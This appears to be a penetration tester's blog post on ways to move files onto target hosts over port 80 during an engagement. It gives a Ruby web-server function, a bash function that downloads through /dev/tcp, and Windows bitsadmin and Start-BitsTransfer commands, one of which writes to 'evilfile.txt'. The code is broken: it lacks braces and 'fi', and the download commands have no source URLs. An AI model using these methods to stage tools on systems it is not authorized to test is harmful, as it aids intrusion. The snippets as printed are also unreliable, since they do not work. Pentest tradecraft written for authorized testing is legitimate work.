Quick Webservers for Transfering Files

Ok, another little ‘quick trick’ of the day while I’m waiting for another task to complete. During a pentest, depending on the traffic filtering between me and a target host, I often find it useful to have several methods on standby for transferring files. One port I can usually count on being open, even between restrictive network segments, is 80/tcp.

To leverage this I have a few things I keep ready. First, I keep a ‘webserver’ function setup in my local rc file for when I need to host a file locally:

function webserver () {
    if [ -z "$1" -o -z "$2" ] ; then
        echo "usage: webserver <port> <path>"
        ruby -r webrick \
            -e "s = WEBrick::HTTPServer.new :Port => $1" \
            -e "s.mount '/', WEBrick::HTTPServlet::FileHandler, '$2'" \
            -e "trap('INT') { s.stop }" \
            -e "s.start"

With that in place, I have a one-word web server ready to roll.

For those occasions when I need something on my remote host I often refer to the handy list of web server one-liners:


On a *nix platform, you have lots of options for moving a file over http with curl, wget, or if all else fails use pure bash and the /dev/tcp/ pseudo-device. I keep a function like this one in my rc file just in case:

_get ()
  IFS=/ read proto z host query <<< "$1"
  exec 3< /dev/tcp/$host/80
    echo GET /$query HTTP/1.1
    echo connection: close
    echo host: $host
   } >&3
   sed '1,/^$/d' <&3 > $(basename $1)

What if you aren’t on a friendly Linux system? On Windows, I have several times utilized bitsadmin to download files. It’s pretty straightforward:

bitsadmin /transfer n c:%homepath%evilfile.txt

However, if it has been deprecated on your target host Microsoft was nice enough to port the functionality over to PowerShell for us:

Start-BitsTransfer -Source -Destination C:\clientdir\testfile1.txt

313 Words

2016-10-13 17:04 -0700